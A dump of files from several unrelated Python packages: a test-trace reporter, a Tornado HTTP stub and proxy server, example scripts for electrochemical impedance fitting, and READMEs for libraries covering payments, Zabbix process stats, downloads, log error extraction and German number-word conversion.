RESULTS[worker].append(test)
# don't count the end of the return code as a fail
if name == 'process-returncode':
return
if status == 'fail':
FAILS.append(test)
stream.write('{%s} %s [%s] ... FAILED\n' % (
worker, name, duration))
if not print_failures:
print_attachments(stream, test, all_channels=True)
elif not failonly:
if status == 'success':
stream.write('{%s} %s [%s] ... ok\n' % (
worker, name, duration))
print_attachments(stream, test)
elif status == 'skip':
stream.write('{%s} %s ... SKIPPED: %s\n' % (
worker, name, test['details']['reason'].as_text()))
else:
stream.write('{%s} %s [%s] ... %s\n' % (
worker, name, duration, test['status']))
if not print_failures:
print_attachments(stream, test, all_channels=True)
stream.flush()
def print_fails(stream):
"""Print summary failure report.
Currently unused, however there remains debate on inline vs. at end
reporting, so leave the utility function for later use.
"""
if not FAILS:
return
stream.write("\n==============================\n")
stream.write("Failed %s tests - output below:" % len(FAILS))
stream.write("\n==============================\n")
for f in FAILS:
stream.write("\n%s\n" % f['id'])
stream.write("%s\n" % ('-' * len(f['id'])))
print_attachments(stream, f, all_channels=True)
stream.write('\n')
def count_tests(key, value):
count = 0
for k, v in RESULTS.items():
for item in v:
if key in item:
if re.search(value, item[key]):
count += 1
return count
def run_time():
runtime = 0.0
for k, v in RESULTS.items():
for test in v:
runtime += float(get_duration(test['timestamps']).strip('s'))
return runtime
def worker_stats(worker):
tests = RESULTS[worker]
num_tests = len(tests)
delta = tests[-1]['timestamps'][1] - tests[0]['timestamps'][0]
return num_tests, delta
def print_summary(stream):
stream.write("\n======\nTotals\n======\n")
stream.write("Run: %s in %s sec.\n" % (count_tests('status', '.*'),
run_time()))
stream.write(" - Passed: %s\n" % count_tests('status', 'success'))
stream.write(" - Skipped: %s\n" % count_tests('status', 'skip'))
stream.write(" - Failed: %s\n" % count_tests('status', 'fail'))
# we could have no results, especially as we filter out the process-codes
if RESULTS:
stream.write("\n==============\nWorker Balance\n==============\n")
for w in range(max(RESULTS.keys()) + 1):
if w not in RESULTS:
stream.write(
" - WARNING: missing Worker %s! "
"Race in testr accounting.\n" % w)
else:
num, time = worker_stats(w)
stream.write(" - Worker %s (%s tests) => %ss\n" %
(w, num, time))
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--no-failure-debug', '-n', action='store_true',
dest='print_failures', help='Disable printing failure '
'debug information in realtime')
parser.add_argument('--fails', '-f', action='store_true',
dest='post_fails', help='Print failure debug '
'information after the stream is proccesed')
parser.add_argument('--failonly', action='store_true',
dest='failonly', help="Don't print success items",
default=(
os.environ.get('TRACE_FAILONLY', False)
is not False))
return parser.parse_args()
def main():
args = parse_args()
stream = subunit.ByteStreamToStreamResult(
sys.stdin, non_subunit_name='stdout')
starts = Starts(sys.stdout)
outcomes = testtools.StreamToDict(
functools.partial(show_outcome, sys.stdout,
print_failures=args.print_failures,
failonly=args.failonly
))
summary = testtools.StreamSummary()
result = testtools.CopyStreamResult([starts, outcomes, summary])
result.startTestRun()
try:
stream.run(result)
finally:
result.stopTestRun()
if count_tests('status', '.*') == 0:
print("The test run didn't actually run any tests")
return 1
if args.post_fails:
print_fails(sys.stdout)
print_summary(sys.stdout)
return (0 if summary.wasSuccessful() else 1)
if __name__ == '__main__':
sys.exit(main()) | zag | /zag-0.2.12.tar.gz/zag-0.2.12/tools/subunit_trace.py | subunit_trace.py |
# Official Zage Bindings for Python
A Python library for Zage's API.
## Installation
You can install this package using pip:
```sh
python -m pip install zage
```
## Usage
This library must be initialized by specifying your credentials for the desired environment (sandbox or prod).
This is as simple as setting `zage.public_key` and `zage.private_key` to the requisite values before making an API call:
```python
import zage
zage.public_key = "test_..."
zage.secret_key = "test_..."
# create a payment token
payment_token = zage.Payments.create_token(
amount=1000, # in cents
webhook="https://zage.app/on_success",
metadata={},
)
print(payment_token)
```
| zage | /zage-0.3.2.tar.gz/zage-0.3.2/README.md | README.md |
# Zaggregator
Zaggregator - is a non-envasive per-process data collector for Zabbix.
It consists of two parts:
- zaggregator (daemon) which fetches and caches process table each zaggregator.daemon.delay (30) seconds, groups processes and stores statistics into sqlite database.
- zcheck script for integrating with zabbix-agent fetches data from sqlite database
There is systemd service file for zaggregator-daemon, but for security reasons pip cannot install files into /etc, so you will need to do it manually. See [Install](#install) section for details.
# Requirements
python3
# Install
Recommended:
```bash
pip install zaggregator
cp /usr/local/share/zaggregator/zaggregator.service /etc/systemd/system/
systemctl enable zaggregator
systemctl start zaggregator
cp /usr/local/share/zaggregator/zaggregator.conf /etc/zabbix/zabbix_agentd.d/
service zabbix-agent restart
```
| zaggregator | /zaggregator-0.0.10.tar.gz/zaggregator-0.0.10/README.md | README.md |
import sys
import re
import logging
import json
import asyncio
from http import HTTPStatus
from copy import deepcopy
from os import path
from collections import namedtuple
from itertools import takewhile
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler, HTTPError
from tornado.options import define
from tornado.httpserver import HTTPServer
from tornado.httputil import HTTPHeaders
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
from tornado.log import enable_pretty_logging
logger = logging.getLogger('zaglushka')
class ResponseStub(namedtuple('_ResponseStub', ['code', 'headers_func', 'body_coroutine', 'delay'])):
def __new__(cls, **kwargs):
data = {k: None for k in cls._fields}
data.update(kwargs)
return super(ResponseStub, cls).__new__(cls, **data)
Rule = namedtuple('Rule', ['matcher', 'responder'])
def _get_stub_file_path(base_stubs_path, stub_path):
return stub_path if stub_path.startswith('/') else path.join(base_stubs_path, stub_path)
class Config(object):
@classmethod
def from_console_argument(cls, config_full_path):
# TODO: tests
if not path.exists(config_full_path):
logger.error('Config not found at {}'.format(config_full_path))
raise Exception('config not found')
with open(config_full_path) as config_fp:
cleaned = json_minify(config_fp.read())
try:
raw_config = json.loads(cleaned, encoding='utf-8')
except ValueError as e:
logger.error('Unable to parse config: {}'.format(e))
raise
return cls(raw_config, config_full_path)
def __init__(self, raw_config, config_full_path):
self.watched_files = {config_full_path}
config_dirname = path.dirname(config_full_path)
if 'stubs_base_path' in raw_config:
stubs_base_path = _get_stub_file_path(config_dirname, raw_config['stubs_base_path'])
else:
stubs_base_path = config_dirname
stubs_base_path = path.abspath(stubs_base_path)
self.raw = raw_config
rules = []
for num, url_spec in enumerate(self.raw.get('urls', [])):
matcher = choose_matcher(url_spec)
if matcher is not None:
responder, responder_paths = choose_responder(url_spec, stubs_base_path)
self.watched_files.update(responder_paths)
rules.append(Rule(matcher, responder))
else:
logger.warning('Unable to build matcher from url spec #{}, skipping'.format(num))
rules.append(Rule(always_match, default_response()))
self.rules = rules
self.stubs_base_path = stubs_base_path
def choose_matcher(spec):
method = spec['method'].upper() if 'method' in spec else None
if 'query' in spec:
query_args_matcher = build_simple_query_args_matcher(spec['query'])
else:
query_args_matcher = always_match
if 'path' in spec:
return build_simple_matcher(spec['path'], method, query_args_matcher)
elif 'path_regexp' in spec:
return build_regexp_matcher(spec['path_regexp'], method, query_args_matcher, warn_func=logger.warning)
else:
return None
def _to_str(value, fallback=False):
if isinstance(value, str):
return value
elif isinstance(value, bytes):
if fallback:
try:
return value.decode('utf-8')
except UnicodeDecodeError:
return chr(0xFFFD)
else:
return value.decode('utf-8')
else:
return str(value)
def _is_args_matched(real_args, required, other_allowed=True):
def _spec2list(dict_):
res = []
for arg, val in dict_.items():
if isinstance(val, (list, set, tuple)):
res.extend((_to_str(arg), _to_str(v)) for v in val)
else:
res.append((_to_str(arg), _to_str(val)))
return res
required = _spec2list(required)
real = _spec2list(real_args)
matched = []
if not other_allowed and len(real) > 0 and len(required) == 0:
return False
for pair in real:
try:
match_index = required.index(pair)
except ValueError:
match_index = None
if match_index is None and not other_allowed:
return False
elif match_index is not None:
required.pop(match_index)
matched.append(pair)
return len(required) == 0
def build_simple_query_args_matcher(args_spec):
def _simple_query_args_matcher(request):
return _is_args_matched(
request.query_arguments,
args_spec.get('required', {}),
args_spec.get('other_allowed', True)
)
return _simple_query_args_matcher
def build_simple_matcher(rel_path, method, query_args_matcher):
return lambda request: ((method is None or request.method == method) and request.path == rel_path and
query_args_matcher(request))
def build_regexp_matcher(pattern, method, query_args_matcher, warn_func=None):
try:
pattern_compiled = re.compile(pattern)
except re.error as e:
if warn_func is not None:
warn_func('Unable to compile regexp "{}": {}'.format(pattern, e))
return None
return lambda request: ((method is None or request.method == method) and
re.search(pattern_compiled, request.path) is not None and
query_args_matcher(request))
def always_match(*_, **__):
return True
def choose_responder(spec, base_stubs_path):
code = int(spec.get('code', HTTPStatus.OK))
delay = float(spec['delay']) if 'delay' in spec else None
stub_kwargs = {'code': code, 'delay': delay}
headers_func, paths = choose_headers_func(spec, base_stubs_path)
responder = None
if 'response' in spec:
body = spec['response']
if not isinstance(body, (str, bytes)):
body = json.dumps(body, ensure_ascii=False)
responder = static_response(body, headers_func, **stub_kwargs)
elif 'response_file' in spec:
full_path = path.normpath(path.join(base_stubs_path, spec['response_file']))
paths.add(full_path)
responder = filebased_response(full_path, headers_func, warn_func=logger.warning, **stub_kwargs)
elif 'response_proxy' in spec and 'path' in spec:
responder = proxied_response(
url=spec['path'], use_regexp=False, proxy_url=spec['response_proxy'],
headers_func=headers_func, warn_func=logger.warn, log_func=logger.debug, **stub_kwargs
)
elif 'response_proxy' in spec and 'path_regexp' in spec:
responder = proxied_response(
url=spec['path_regexp'], use_regexp=True, proxy_url=spec['response_proxy'],
headers_func=headers_func, warn_func=logger.warning, log_func=logger.debug, **stub_kwargs
)
if responder is None:
responder = static_response(b'', headers_func, **stub_kwargs)
return responder, paths
def static_response(body, headers_func, **stub_kwargs):
async def _body_coroutine(handler):
handler.write(body)
return ResponseStub(headers_func=headers_func,
body_coroutine=_body_coroutine,
**stub_kwargs)
def default_response():
return static_response(
body='',
headers_func=build_static_headers_func({
'X-Zaglushka-Default-Response': 'true',
}),
code=HTTPStatus.NOT_FOUND
)
def filebased_response(full_path, headers_func, warn_func=None, **stub_kwargs):
async def _body_coroutine(handler):
# detect a file at every request, so you can add it where ever you want
if not path.isfile(full_path):
if warn_func is not None:
warn_func('Unable to find stubs file "{f}" for {m} {url}'
.format(f=full_path, m=handler.request.method, url=handler.request.uri))
handler.set_header('X-Zaglushka-Failed-Response', 'true')
return
await send_file(full_path, handler)
return ResponseStub(headers_func=headers_func,
body_coroutine=_body_coroutine,
**stub_kwargs)
async def _fetch_request(http_client, request):
return http_client.fetch(request) # for easier testing
def proxied_response(url, use_regexp, proxy_url, headers_func, warn_func=None, log_func=None, **stub_kwargs):
url_regexp = None
if use_regexp:
try:
url_regexp = re.compile(url)
except re.error as e:
if warn_func is not None:
warn_func('Unable to compile url pattern "{}": {}'.format(url, e))
return default_response()
async def _body_coroutine(handler):
request_url = proxy_url
if url_regexp:
match = url_regexp.search(handler.request.uri)
if match is None:
handler.set_header('X-Zaglushka-Failed-Response', 'true')
return
for i, group in enumerate(match.groups(), start=1):
request_url = request_url.replace('${}'.format(i), group)
http_client = handler.application.settings['http_client']
method = handler.request.method
if method in ('HEAD', 'BODY') and handler.request.body == '': # :(
body = None
else:
body = handler.request.body
request = HTTPRequest(request_url, method=method, headers=handler.request.headers,
body=body, follow_redirects=False, allow_nonstandard_methods=True)
if log_func:
log_func('Fetch request {r.method} {r.url}'.format(r=request))
response = await _fetch_request(http_client, request)
if log_func:
log_func('Request {r.method} {r.url} complete with code={rc}'.format(r=request, rc=response.code))
if response.code == 599: # special tornado status code
handler.set_header('X-Zaglushka-Failed-Response', 'true')
if warn_func is not None:
warn_func('Unable to proxy response to "{u}": {e}'.format(u=request_url, e=response.error))
return
headers_before = deepcopy(handler.get_headers())
handler.write(response.body)
for header, value in response.headers.items():
handler.add_header(header, value)
# replace with headers from a config if any
for header, _ in headers_before.get_all():
handler.clear_header(header)
for value in headers_before.get_list(header):
handler.add_header(header, value)
handler.set_status(response.code)
return
return ResponseStub(headers_func=headers_func,
body_coroutine=_body_coroutine,
**stub_kwargs)
def choose_headers_func(spec, base_stubs_path):
paths = set()
if 'headers' in spec:
return build_static_headers_func(spec['headers']), paths
elif 'headers_file' in spec:
stub_path = _get_stub_file_path(base_stubs_path, spec['headers_file'])
paths.add(stub_path)
return build_filebased_headers_func(stub_path, warn_func=logger.warning), paths
else:
return build_static_headers_func({}), paths
def build_static_headers_func(headers):
def _static_headers_func(handler):
for header, values in headers.items():
if not isinstance(values, (list, tuple, set, frozenset)):
values = [values]
for value in values:
handler.add_header(header, value)
return _static_headers_func
def build_filebased_headers_func(full_path, warn_func=None):
def _filebased_headers_func(handler):
if not path.isfile(full_path):
if warn_func is not None:
warn_func('Unable to find headers stubs file "{f}" for {m} {url}'
.format(f=full_path, m=handler.request.method, url=handler.request.uri))
handler.add_header('X-Zaglushka-Failed-Headers', 'true')
return
for header, value in HTTPHeaders.parse(open(full_path, 'r').read()).get_all():
handler.add_header(header, value)
return _filebased_headers_func
def json_minify(data, strip_space=True):
"""
json_minify v0.1 (C) Gerald Storer
MIT License
Based on JSON.minify.js:
https://github.com/getify/JSON.minify
"""
tokenizer = re.compile(r'"|(/\*)|(\*/)|(//)|\n|\r')
in_string = False
in_multiline_comment = False
in_singleline_comment = False
new_str = []
from_index = 0 # from is a keyword in Python
for match in re.finditer(tokenizer, data):
if not in_multiline_comment and not in_singleline_comment:
tmp2 = data[from_index:match.start()]
if not in_string and strip_space:
tmp2 = re.sub('[ \t\n\r]*', '', tmp2) # replace only white space defined in standard
new_str.append(tmp2)
from_index = match.end()
if match.group() == '"' and not in_multiline_comment and not in_singleline_comment:
escaped = re.search('(\\\\)*$', data[:match.start()])
if not in_string or escaped is None or len(escaped.group()) % 2 == 0:
# start of string with ", or unescaped " character found to end string
in_string = not in_string
from_index -= 1 # include " character in next catch
elif match.group() == '/*' and not in_string and not in_multiline_comment and not in_singleline_comment:
in_multiline_comment = True
elif match.group() == '*/' and not in_string and in_multiline_comment and not in_singleline_comment:
in_multiline_comment = False
elif match.group() == '//' and not in_string and not in_multiline_comment and not in_singleline_comment:
in_singleline_comment = True
elif ((match.group() == '\n' or match.group() == '\r') and not in_string and not in_multiline_comment and
in_singleline_comment):
in_singleline_comment = False
elif (not in_multiline_comment and not in_singleline_comment and
(match.group() not in ['\n', '\r', ' ', '\t'] or not strip_space)):
new_str.append(match.group())
new_str.append(data[from_index:])
return ''.join(new_str)
async def send_file(full_path, handler: RequestHandler, chunk_size=1024 * 8):
fd = open(full_path, 'rb') # TODO: check exceptions
while True:
try:
data = fd.read(chunk_size)
except (IOError, OSError):
data = None
if data is not None and len(data) > 0:
handler.write(data)
await handler.flush()
else:
fd.close()
break
class StubHandler(RequestHandler):
async def get(self):
await self.send_stub()
async def post(self):
await self.send_stub()
async def put(self):
await self.send_stub()
async def delete(self):
await self.send_stub()
async def patch(self):
await self.send_stub()
async def head(self):
await self.send_stub()
async def options(self):
await self.send_stub()
def get_headers(self):
return self._headers
async def _make_response_with_rule(self, responder: ResponseStub):
if responder.delay is not None:
logger.debug('Delay response for {m} {u} by {sec:.3f} sec'.format(m=self.request.method,
u=self.request.uri,
sec=responder.delay))
await asyncio.sleep(responder.delay)
self.set_status(responder.code)
responder.headers_func(self)
await responder.body_coroutine(self)
async def send_stub(self):
self.clear_header('Server')
self.clear_header('Content-Type')
self.clear_header('Date')
config = self.application.settings['zaglushka_config']
matched = False
for rule in config.rules:
if rule.matcher(self.request):
await self._make_response_with_rule(rule.responder)
matched = True
break
if not matched:
raise HTTPError(HTTPStatus.INTERNAL_SERVER_ERROR)
def compute_etag(self):
return None
def build_app(zaglushka_config, debug=False):
http_client = AsyncHTTPClient()
return Application(
handlers=[(r'.*', StubHandler)],
debug=debug,
zaglushka_config=zaglushka_config,
http_client=http_client
)
def wait_when_config_fixed(config_full_path, exception=None):
import tornado.autoreload
logger.error('Your config in broken. Fix it then server starts automaticaly.')
logger.error('Config error: {}'.format(exception))
logger.error('Server not started')
tornado.autoreload.watch(config_full_path)
tornado.autoreload.wait()
def parse_options(args, err_func):
define('ports', multiple=True, type=int, help='listen ports (one or more)', metavar='PORT[,PORT,...]',
default=[8001])
define('config', type=str, help='zaglushka config path')
define('watch', type=bool, help='watch config and stubs for changes', default=True)
from tornado.options import options
options.logging = 'debug'
enable_pretty_logging(options)
script_name = args[0]
simple_args = list(takewhile(lambda i: not i.startswith('--'), args[1:]))
other_args = args[len(simple_args) + 1:]
other_args.insert(0, script_name)
if simple_args:
if len(simple_args) > 2:
err_func('More than two simple args')
return None
elif len(simple_args) == 2:
config, ports = simple_args
else:
config = simple_args[0]
ports = None
options.config = config
if ports:
ports = (i.strip() for i in ports.split(','))
try:
ports = [int(p) for p in ports]
except (TypeError, ValueError):
err_func('Wrong port value')
return None
options.ports = ports
options.logging = 'debug'
options.parse_command_line(args=other_args)
return options
def main(args):
options = parse_options(args, err_func=logger.error)
if options is None:
return 1
watch = options.watch
if not options.config:
logger.error('--config param is required')
return 1
config_full_path = path.abspath(path.expanduser(options.config))
try:
config = Config.from_console_argument(config_full_path)
except Exception as e:
return wait_when_config_fixed(config_full_path, e) if watch else 2
application = build_app(config, debug=True)
if watch:
import tornado.autoreload
logger.debug('watch files:\n * %s', '\n * '.join(config.watched_files))
for file in config.watched_files:
tornado.autoreload.watch(file)
server = HTTPServer(application)
logger.info('Server started')
logger.debug('Config: %s', config_full_path)
for port in options.ports:
logger.info('Listen for 0.0.0.0:{}'.format(port))
server.listen(port, '0.0.0.0')
try:
IOLoop.instance().start()
except KeyboardInterrupt:
logger.info('Server stopped')
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv)) | zaglushka | /zaglushka-0.1.0-py3-none-any.whl/zaglushka-0.1.0.data/scripts/zaglushka.py | zaglushka.py |
.. -*- rst -*- -*- restructuredtext -*-
.. image:: https://img.shields.io/travis/napuzba/zagoload.svg?maxAge=2592000&style=plastic :target: https://travis-ci.org/napuzba/zagoload
.. image:: https://img.shields.io/github/watchers/napuzba/zagoload.svg??style=social&label=watchers&link=https://github.com/napuzba/zagoload&style=social :target: https://github.com/napuzba/zagoload
zagoload is library which simplifies downloading remote files:
1. Support for HTTP and FTP protocols.
2. Access to remote files and local files in uniform way.
3. Consume restful webservices with a breeze
4. Cache your downloaded files to save resources
Documentation
-------------
See `Download Files with zagoload`_ for turorial.
.. _Download Files with zagoload: http://www.napuzba.com/story/download-files-with-zagoload/
| zagoload | /zagoload-0.5.1.zip/zagoload-0.5.1/README.rst | README.rst |
### LogTool is used to extract all ***Unique Errors messages*** from log files that took place in the past.
## General
As the user, you can provide the "since time" and debug level to be used for extraction of Errors/Warnings.
For example, if something went wrong in the past, you're be able to extract Error/Warnings messages
for just that time period.
Let's say that you have all relevant log files located in: **/var/log/containers** and that the problem you are
trying to debug, happened after: **2020-08-25 12:00:00**
<br>If so, you'll need to set the following values in **".ini"** configuration file and to provide:
time_grep=2020-08-25 12:00:00
log_root_dir=['var/log/containers']
string_for_grep = ERROR
## Installation
pip3 install zahlabut
## Configuration file
Prior to starting analyze process, you'll need to create and load the configuration file.
Configuration file could be any *.ini file and you can find the example/template on GitHub:
https://github.com/zahlabut/LogToolPyPi/blob/master/conf.ini
<br>**Note:** change the configuration according to your needs.
## Usage - Python code example
#!/usr/bin/python3
from zahlabut.LogTool import * # To import all from zahlabut LogTool package
load_conf_file('conf.ini') # To load the cofiguration file (conf.ini).
result=start_analyzing() # Start analyzing log files.
print(result['Standard_Log_Results'][0]) # First item in result list (raw data) for Standard logs.
print(result['Not_Standard_Log_Results'][0]) # First item in result list (raw data) for Not Standard logs.
## Generated result files
LogTool result files will be generated according to the settings provided in **"conf.ini"** file.
create_logtool_result_file=yes
log_tool_result_file = ResultFile.log
save_standard_logs_raw_data_file='Standard_Logs_Output.log'
save_not_standard_logs_raw_data_file='Not_Standard_Logs_Output.log'
Once **"log_tool_result_file = ResultFile.log"** is generated you'll be able to find all the statistics + exported
unique Error blocks in this file. Created file is generated with some simple logic (its content is divided into the sections) see
the description on the top of created result file.
| zahlabut | /zahlabut-0.0.2.18.tar.gz/zahlabut-0.0.2.18/README.md | README.md |
# ZahlWort2num (v.0.4.2)
:de: :de: :de:
A small but useful (due shortage of/low quality support for `lang_de`) package for handy conversion of german numerals (incl. ordinal number) written as string to the from numbers.
To put it differently: _It allows reverse text normalization for numbers_.
This package might be a good complementary lib to https://github.com/savoirfairelinux/num2words
:crying_cat_face: _Currently is doesn't support swiss variant. TBD_ :switzerland:
# PyPi direct page of project
https://pypi.org/project/zahlwort2num/
# Installation
`pip2 install zahlwort2num`
# Usage
### _Definition_: <br />
```python
import zahlwort2num as w2n
```
### _Few examples_: <br />
```python
w2n.convert('Zweihundertfünfundzwanzig') # => 225
w2n.convert('neunte') # => '9.'
w2n.convert('minus siebenhundert Millionen achtundsiebzig') # => -700000078
```
_or even stuff like:_ :see_no_evil: <br />
```python
w2n.convert('sechshundertdreiundfünfzigtausendfünfhunderteinundzwanzig') # => 653521
```
#### Command line:
* _(Obviously it is better to use a parameter enclosed with apostrophs due to possible spaces)_
```
bin/zahlwort2num-convert 'eine Million siebenhunderteinundzwanzig'
```
# Development
Before doing anything. Install flake8 locally by
```bash
python3 -m pip install -r requirements.txt
```
Make sure tests are passing
```bash
python3 -m unittest
```
and you locally run linter via
```bash
flake8 ./zahlwort2num/*.py --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
```
# WIKI
TBD
# Already implemented features :sunglasses:
* Theoretically it works for any numbers from range 0 upto 999 * 10^27 [big numbers]
* Command-line mode ([see](#command-line) above)
* Supported with ordinal numerals (incl. inflections [sufficies like `'ste', 'ten'` etc. ])<br />
_In this case it returns coerced __String__ type value e.g '15.' instead of __Integer___ :point_up:
* Relative mild rules in terms of trailing whitespaces, lower/upper-case (unification).
* Handling of signed numerals (also ordinal ones) e.g `'minus zehn'`
# TODO / Known issues
- [x] ~~Make POC, functional for all common cases~~
- [x] ~~Ordinal number support~~
- [x] ~~Take care for exceptions / trailing whitespaces etc.~~
- [x] ~~Make structure + publish as PyPI package~~
- [x] ~~Command line support :computer:~~
- [x] ~~Added support for both non-direct usage e.g einhundert / hundert~~
- [x] ~~Simplify/refactor POC code, add better documentation~~
- [x] ~~Zwo variant~~
- [x] ~~Added linter with Test Suite as hook~~
- [ ] More comprehensible tests
- [ ] Swiss variant
- [ ] More fault tolerant (ß -> ss) etc
- [ ] Larger scale than 10^60
- [ ] Ordinal with very large numbers (without addons) e.g `Millionste`
- [ ] Few benchmark improvements (e.g tail recursion etc)
- [ ] Better error handling + validation for idiotical cases (e.g `minus null Miliarde`)
- [ ] Support for fractions?
# Thanks
- @warichet for addressing problem
- @spatialbitz for writing simple fix :+1:
- @psawa - adding support for `zwo` case
- ... lastly to any of you who uses this package ;-)
| zahlwort2num | /zahlwort2num-0.4.2.tar.gz/zahlwort2num-0.4.2/README.md | README.md |

[zahner_analysis](zahner_analysis) is a Python package which uses the [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) to evaluate measured electrochemical data.
The Python package [zahner_analysis](zahner_analysis) is a client for the [REST interface](https://en.wikipedia.org/wiki/Representational_state_transfer) of the [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) module *Remote Evaluation*. This module is optional and must be [selected for installation](https://doc.zahner.de/zahner_analysis/analysis_connection.html#basic-informations) when installing the Zahner Analysis.
A equivalent electrical circuit model for an impedance measurement can be easily developed with the graphical interface of the [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis). The *Magic Wand Preset Element Tool* tool is available to determine appropriate initial values for the fit.

With Python the equivalent electrical circuit models, which have been created with the GUI, can be fitted to impedance spectra.
The elements and parameters of the model can be read and processed with Python.
With the Python package [thales_remote](https://github.com/Zahner-elektrik/Thales-Remote-Python) as a supplement, EIS measurements can be performed with a Zennium and immediately evaluated. The [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) is not required for importing and plotting data with Python.
Additional features are the import of measurement data for CV and I/E measurements (isc and iss files). For this the [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) is not necessary.
# 📚 Documentation
## Python Package
The complete documentation of the individual functions can be found on the [API documentation website](https://doc.zahner.de/zahner_analysis/).
## REST-API
The REST-API was documented using OpenAPI. The configuration [file](openapi.yaml) is in the repository and the generated html page can be found at the following [url](https://doc.zahner.de/zahner_analysis/analysis_remote.html).
# 🔧 Installation
The package can be installed via pip.
```text
pip install zahner_analysis
```
The [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) must be downloaded from the [Zahner-Elektrik website](https://zahner.de/products-details/software/Zahner-Analysis) in order to be installed.
# 🔨 Basic Usage
The [Jupyter](https://jupyter.org/) notebook [BasicIntroduction.ipynb](Examples/BasicIntroduction/BasicIntroduction.ipynb) explains the fundamentals of using the library.
```python
"""
Load data and model
"""
impedanceCircuitModel = IsfxModelImport("li-ion-model.isfx")
impedanceData = IsmImport("li-ion-battery.ism")
"""
Create the EisFitting object
"""
fitting = EisFitting()
"""
Fit the equivalent electrical circuit model to the data
"""
fittingResult = fitting.fit(impedanceCircuitModel, impedanceData)
"""
Plot the result
"""
EisFittingPlotter.plotBode(fittingResult)
```

# 📖 Examples
The following examples are build on each other, you should read and understand them in sequence.
If measurement data are saved from the examples, they are located in the corresponding directory of the example.
## [BasicIntroduction.ipynb](https://github.com/Zahner-elektrik/Zahner-Analysis-Python/blob/main/Examples/BasicIntroduction/BasicIntroduction.ipynb)
* Load the data and the model
* Fit the model to the data
* Plot the result
## [ComplexFitConfigurations.ipynb](https://github.com/Zahner-elektrik/Zahner-Analysis-Python/blob/main/Examples/ComplexFitConfigurations/ComplexFitConfigurations.ipynb)
* Showing all configuration options
* Customize the connection to Zahner Analysis Software
* Optional fit and simulation parameters
* Optional plotting parameters
## [ImpedanceVsVoltageSeriesFit.ipynb](https://github.com/Zahner-elektrik/Zahner-Analysis-Python/blob/main/Examples/ImpedanceVsVoltageSeriesFit/ImpedanceVsVoltageSeriesFit.ipynb)
* EIS series fit
* Load all files from a directory
* Plot circuit element vs series parameter
## [ZHIT.ipynb](https://github.com/Zahner-elektrik/Zahner-Analysis-Python/blob/main/Examples/ZHIT/ZHIT.ipynb)
* Fit the model to the data
* Load the data and the model
* Perform ZHIT evaluation
* Plot the result
## [SetupCompensation.ipynb](https://github.com/Zahner-elektrik/Zahner-Analysis-Python/blob/main/Examples/SetupCompensation/SetupCompensation.ipynb)
* Apply Short-Open-Load correction to EIS data
# 📧 Having a question?
Send an [mail](mailto:[email protected]?subject=Zahner-Analysis-Python%20Question&body=Your%20Message) to our support team.
# ⁉️ Found a bug or missing a specific feature?
Feel free to **create a new issue** with a respective title and description on the the [Zahner-Analysis-Python](https://github.com/Zahner-elektrik/Zahner-Analysis-Python/issues) repository.
If you already found a solution to your problem, **we would love to review your pull request**!
# ✅ Requirements
Programming is done with the latest Python version at the time of commit.
If you work with equivalent circuits and you need the fit and simulate functions, you need the [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) with its REST interface. To use the REST interface, you need a licensed [Zahner Analysis](https://zahner.de/products-details/software/Zahner-Analysis) with at least version **3.2.1**. The [Zahner Analysis Software](https://zahner.de/products-details/software/Zahner-Analysis) is **not required for importing and plotting** data.
The packages [matplotlib](https://matplotlib.org/), [SciPy](https://scipy.org/) and [NumPy](https://numpy.org/) are used to display the measurement results. The [requests package](https://pypi.org/project/requests/) is necessary to communicate with the Zahner Analysis. Jupyter is not necessary, each example is also available as a Python file.
| zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/README.md | README.md |
from zahner_analysis.analysis_tools.eis_fitting import EisFitting
from zahner_analysis.file_import.impedance_model_import import IsfxModelImport
from zahner_analysis.file_import.ism_import import IsmImport
from zahner_analysis.plotting.impedance_plot import bodePlotter
import matplotlib.pyplot as plt
if __name__ == "__main__":
fitting = EisFitting()
dataWithDrift = IsmImport("drift.ism")
dataWithZHIT = fitting.zhit(dataWithDrift)
(fig1, (impedanceAxis1, phaseAxis1)) = bodePlotter(impedanceObject=dataWithDrift)
(fig1, (impedanceAxis1, phaseAxis1)) = bodePlotter(
(impedanceAxis1, phaseAxis1),
impedanceObject=dataWithZHIT,
argsImpedanceAxis={"linestyle": "solid", "marker": None},
argsPhaseAxis={"linestyle": "solid", "marker": None},
)
phaseAxis1.legend(["Original", "ZHIT"])
fig1.set_size_inches(18, 10)
fitParams = {
"DataSource": "zhit",
"Smoothness": 0.0002,
"NumberOfSamples": 40,
}
impedanceCircuitModel = IsfxModelImport("RC-R-L.isfx")
fittingResult = fitting.fit(
impedanceCircuitModel, dataWithDrift, fitParams=fitParams
)
print(fittingResult)
(fig2, (impedanceAxis2, phaseAxis2)) = bodePlotter(impedanceObject=dataWithDrift)
(fig2, (impedanceAxis2, phaseAxis2)) = bodePlotter(
(impedanceAxis2, phaseAxis2),
impedanceObject=fittingResult.getFittedSimulatedData(),
argsImpedanceAxis={"linestyle": "solid", "marker": None},
argsPhaseAxis={"linestyle": "solid", "marker": None},
)
(fig2, (impedanceAxis2, phaseAxis2)) = bodePlotter(
(impedanceAxis2, phaseAxis2),
impedanceObject=fittingResult.getFitInputData(),
argsImpedanceAxis={"linestyle": "None", "marker": "x"},
argsPhaseAxis={"linestyle": "None", "marker": "x"},
)
phaseAxis2.legend(["Original", "Fitted", "ZHIT"])
fig2.set_size_inches(18, 10)
fittingResult.getFitInputData().save("ZHIT.ism")
plt.show() | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/Examples/ZHIT/ZHIT.py | ZHIT.py |
from zahner_analysis.analysis_tools.eis_fitting import EisFitting, EisFittingPlotter
from zahner_analysis.file_import.impedance_model_import import IsfxModelImport
from zahner_analysis.file_import.ism_import import IsmImport
from zahner_analysis.analysis_tools.analysis_connection import AnalysisConnection
from zahner_analysis.plotting.impedance_plot import bodePlotter
import matplotlib.pyplot as plt
